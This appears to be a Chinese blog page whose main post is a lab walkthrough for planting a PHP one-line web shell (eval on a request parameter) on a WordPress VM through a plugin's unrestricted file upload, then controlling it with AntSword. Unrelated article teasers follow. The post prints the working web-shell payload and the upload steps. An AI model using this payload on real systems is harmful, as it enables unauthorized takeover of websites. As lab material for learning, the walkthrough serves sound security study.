news 2026/6/23 19:54:43

利用一句话木马夺取目标网站的shell

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
利用一句话木马夺取目标网站的shell

实验准备

目标网站:webdeveloper

工具:一句话木马(shell.php)、蚁剑

实验环境:物理机、虚拟机kali

一、在kali桌面创建一个shell.php文件,写入一句话木马,如图

<?php
@eval($_REQUEST["shell"]);
?>

二、将木马上传webdeveloper网站

利用插件上传不限制文件的漏洞,选择木马文件并上传,显示"not be installed"没关系,打开网页目录:http://192.168.194.134/wp-content/uploads/2025/12/

可以发现shell.php已经下载到网页的uploads目录里:

三、在物理机利用蚁剑连接目标网站

成功连接并控制目标网站,接下来可以随意查看文件,完成目标。

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/6/18 19:26:53

【2026版】Spring Boot面试题

这篇文章涵盖了Spring Boot的核心概念和高级主题&#xff0c;包括自动配置、多数据源、Actuator、缓存、AOP、异步编程、事务管理、安全性、消息队列和微服务架构。这些问题可以帮助您评估候选人的技能和经验&#xff0c;同时也是提高自己Spring Boot技能的好方法。 1. Spring …

作者头像 李华
网站建设 2026/6/23 5:01:11

办公小程序开发----提高工作效率

文章目录 前言一、批量html文件转化为pdf1. 问题描述2.代码3.程序下载链接 总结 前言 办公过程中&#xff0c;总是会遇到一些大量重复做的事情&#xff0c;通过生成一些小程序&#xff0c;提高办公效率。 一、批量html文件转化为pdf 1. 问题描述 我需要将若干的html文件转换…

作者头像 李华
网站建设 2026/6/23 19:48:18

Jmeter 命令行压测生成HTML测试报告

&#x1f345; 点击文末小卡片&#xff0c;免费获取软件测试全套资料&#xff0c;资料在手&#xff0c;涨薪更快通常Jmeter的 GUI 模式仅用于调试&#xff0c;在实际的压测项目中&#xff0c;为了让压测机有更好的性能&#xff0c;多用 Jmeter 命令行来进行压测。同时&#xff…

作者头像 李华
网站建设 2026/6/23 11:57:01

AI编程系列——mcp与skill

mcp是啥 Model Context Protocol MCP&#xff1a;AI Agent 工具托管协议及应用 简单来说 就是让ai可以调用外部服务&#xff0c;比如你们公司的cicd功能、让你部署的deepseek连上A股实时行情 变成你的ai炒股小助理 抓取网页爬虫…… MCP 协议概述定义: MCP (Model Context Pro…

作者头像 李华
网站建设 2026/6/23 16:15:45

技术文章大纲:当云原生遇见VMware

云原生与VMware的融合背景云原生技术的核心概念&#xff08;容器化、微服务、DevOps、持续交付&#xff09;VMware在虚拟化领域的传统优势&#xff08;vSphere、ESXi、vCenter&#xff09;企业数字化转型中两者结合的必然性VMware对云原生的支持方案Tanzu产品线&#xff1a;Tan…

作者头像 李华